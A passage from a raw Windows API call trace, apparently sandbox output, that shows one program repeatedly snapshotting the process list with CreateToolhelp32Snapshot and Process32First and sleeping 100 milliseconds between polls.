0x1d90 [0153.593] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.755] Sleep (dwMilliseconds=0x64) [0153.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0153.892] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.170] Sleep (dwMilliseconds=0x64) [0154.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0154.340] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.504] Sleep (dwMilliseconds=0x64) [0154.617] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0154.649] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.814] Sleep (dwMilliseconds=0x64) [0154.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0155.005] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.200] Sleep (dwMilliseconds=0x64) [0155.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0155.349] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.502] Sleep (dwMilliseconds=0x64) [0155.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0155.659] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.858] Sleep (dwMilliseconds=0x64) [0155.970] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0155.982] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.183] Sleep (dwMilliseconds=0x64) [0156.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0156.322] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.476] Sleep (dwMilliseconds=0x64) [0156.620] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0156.651] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.827] Sleep (dwMilliseconds=0x64) [0156.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0156.977] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.168] Sleep (dwMilliseconds=0x64) [0157.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0157.301] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.462] Sleep (dwMilliseconds=0x64) [0157.629] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0157.672] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.866] Sleep (dwMilliseconds=0x64) [0157.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0158.004] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.146] Sleep (dwMilliseconds=0x64) [0158.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0158.160] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.348] Sleep (dwMilliseconds=0x64) [0158.392] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0158.442] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.589] Sleep (dwMilliseconds=0x64) [0158.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0158.655] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.841] Sleep (dwMilliseconds=0x64) [0158.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0158.892] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.038] Sleep (dwMilliseconds=0x64) [0159.101] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0159.162] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.333] Sleep (dwMilliseconds=0x64) [0159.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0159.386] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.531] Sleep (dwMilliseconds=0x64) [0159.568] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0159.616] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.772] Sleep (dwMilliseconds=0x64) [0159.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0159.821] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.028] Sleep (dwMilliseconds=0x64) [0160.096] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0160.112] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.271] Sleep (dwMilliseconds=0x64) [0160.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0160.361] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.506] Sleep (dwMilliseconds=0x64) [0160.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0160.552] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.716] Sleep (dwMilliseconds=0x64) [0160.758] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0160.771] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.920] Sleep (dwMilliseconds=0x64) [0160.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0161.015] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.187] Sleep (dwMilliseconds=0x64) [0161.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0161.250] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.409] Sleep (dwMilliseconds=0x64) [0161.411] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0161.458] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.613] Sleep (dwMilliseconds=0x64) [0161.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0161.679] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.830] Sleep (dwMilliseconds=0x64) [0161.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0161.902] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.107] Sleep (dwMilliseconds=0x64) [0162.113] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0162.206] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.512] Sleep (dwMilliseconds=0x64) [0162.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0162.564] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.733] Sleep (dwMilliseconds=0x64) [0162.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0162.845] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.028] Sleep (dwMilliseconds=0x64) [0163.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0163.071] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.185] Sleep (dwMilliseconds=0x64) [0163.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0163.201] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.289] Sleep (dwMilliseconds=0x64) [0163.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0163.340] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.609] Sleep (dwMilliseconds=0x64) [0163.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0163.692] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.888] Sleep (dwMilliseconds=0x64) [0163.899] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0163.944] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.125] Sleep (dwMilliseconds=0x64) [0164.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0164.269] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.408] Sleep (dwMilliseconds=0x64) [0164.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0164.446] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.556] Sleep (dwMilliseconds=0x64) [0164.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0164.572] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.771] Sleep (dwMilliseconds=0x64) [0164.805] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0164.864] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.072] Sleep (dwMilliseconds=0x64) [0165.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0165.142] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.373] Sleep (dwMilliseconds=0x64) [0165.396] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0165.417] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.574] Sleep (dwMilliseconds=0x64) [0165.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0165.622] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.780] Sleep (dwMilliseconds=0x64) [0165.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0165.927] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.076] Sleep (dwMilliseconds=0x64) [0166.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0166.133] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.326] Sleep (dwMilliseconds=0x64) [0166.367] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0166.436] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.598] Sleep (dwMilliseconds=0x64) [0166.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0166.655] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.808] Sleep (dwMilliseconds=0x64) [0166.844] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0166.898] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.125] Sleep (dwMilliseconds=0x64) [0167.133] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0167.180] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.324] Sleep (dwMilliseconds=0x64) [0167.367] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0167.427] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.557] Sleep (dwMilliseconds=0x64) [0167.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0167.606] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.763] Sleep (dwMilliseconds=0x64) [0167.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0167.814] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.998] Sleep (dwMilliseconds=0x64) [0168.043] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0168.060] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.300] Sleep (dwMilliseconds=0x64) [0168.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0168.349] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.500] Sleep (dwMilliseconds=0x64) [0168.570] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0168.585] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.675] Sleep (dwMilliseconds=0x64) [0168.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0168.692] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.783] Sleep (dwMilliseconds=0x64) [0168.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0168.799] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, 